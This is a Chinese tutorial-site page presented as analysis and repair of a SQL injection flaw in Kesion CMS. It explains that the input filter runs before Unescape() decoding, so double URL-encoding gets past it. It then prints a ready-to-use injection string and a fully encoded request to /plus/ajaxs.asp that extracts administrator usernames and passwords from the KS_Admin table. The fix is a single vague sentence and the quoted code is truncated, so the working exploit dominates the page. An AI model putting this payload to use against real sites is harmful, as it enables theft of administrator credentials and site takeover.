最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
Kesion cms sql注入漏洞修复及其分析
时间:2012-07-08 编辑:简简单单 来源:一聚教程网
先我们来看代码
代码如下 | 复制代码 |
Dim KS:Set KS=New PublicCls |
如果配合Unescape()函数,刚过滤不会生效。可以采用unicode编码方式,则不会在浏览器中出现被过滤的字符。例如,单引号可以编码为。%2527,经过解码后还是“'”号,这样的话,就可以利用类似php的二次编码漏洞的方式绕过过滤了。
注入语句:%') union select 1,2,username+'|'+ password from KS_Admin
转换如下:
代码如下 | 复制代码 |
/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 |
先进行了过滤,然后才调用UnEscape解码,
代码如下 | 复制代码 |
Public Function S(Str) |
这样我们还是开头的那句话使用unescape()函数或者不使用本函数。
-
上一个: javascript判断浏览器是否ie
相关文章
- 深入分析SQLServer注入技巧 08-12
- Java安全之SQL注入漏洞分析 12-02
- 防止SQL注入攻击的一些方法总结 11-05
- 常用的SQL注入攻击方法总结 08-14
- SQL有效防止SQL注入方法总结? 10-11
- 防止SQL语句注入攻击总结 07-11